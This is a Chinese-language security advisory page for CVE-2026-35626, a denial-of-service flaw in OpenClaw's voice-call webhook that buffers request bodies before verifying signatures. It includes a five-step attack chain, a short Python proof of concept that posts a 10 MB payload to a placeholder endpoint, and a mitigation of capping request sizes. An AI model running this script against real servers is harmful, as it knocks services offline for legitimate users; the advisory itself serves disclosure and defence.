CVE-2026-35626 CVSS 5.3 中危

CVE-2026-35626 OpenClaw 未认证资源耗尽漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35626

漏洞类型

资源耗尽

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.22之前的版本中存在一个未认证的资源耗尽漏洞。该漏洞位于语音通话Webhook处理模块，由于系统在验证提供商签名之前就缓冲了请求体，攻击者无需身份认证即可发送大型或恶意请求。这会导致服务器资源被耗尽，从而造成拒绝服务攻击。

技术细节

该漏洞的根本原因在于OpenClaw Webhook处理流程中的逻辑顺序缺陷。受影响版本在处理语音通话回调请求时，优先执行了请求体的内存缓冲操作，而将用于验证请求合法性的提供商签名检查置于其后。这种机制使得服务器在尚未确认请求来源可信的情况下，就先分配了内存资源并接收了完整数据。攻击者利用这一特性，可以通过网络发送构造的超大HTTP POST请求。由于无需认证且攻击复杂度低，攻击者能够轻易向目标服务器发起海量数据轰炸。这将导致服务器内存溢出或连接超时，从而耗尽系统资源，造成合法用户无法访问服务，最终实现未认证的拒绝服务攻击。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器正在使用OpenClaw，并定位到语音通话Webhook接口的URL。

STEP 2

资源准备

攻击者构造一个包含超大数据量（如巨大的JSON或二进制流）的HTTP POST请求包。

STEP 3

漏洞利用

攻击者直接向Webhook端点发送恶意请求，无需提供任何认证凭证或有效签名。

STEP 4

资源耗尽

服务器在验证签名前尝试将整个请求体加载到内存缓冲区，导致内存资源被迅速占用。

STEP 5

拒绝服务

由于资源耗尽，服务器无法处理合法用户的请求，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (replace with actual endpoint)
target_url = "http://target-openclaw-server/api/webhook/voice"

# Generate a large payload to exhaust server resources
# Sending a 10MB payload
large_payload = "A" * (10 * 1024 * 1024)

headers = {
    "User-Agent": "CVE-2026-35626-POC",
    "Content-Type": "application/json"
}

try:
    print(f"Sending large payload to {target_url}...")
    # The vulnerability occurs because the server buffers the body
    # before checking the signature in the headers.
    response = requests.post(target_url, data=large_payload, headers=headers, timeout=10)
    print(f"Response status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"Request failed or server timed out (Possible DoS): {e}")

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

如果无法立即升级，建议在网络边界设备（如防火墙或反向代理）上配置策略，限制传入Webhook请求的Content-Length和最大传输大小，以防止服务器因处理超大请求而耗尽资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表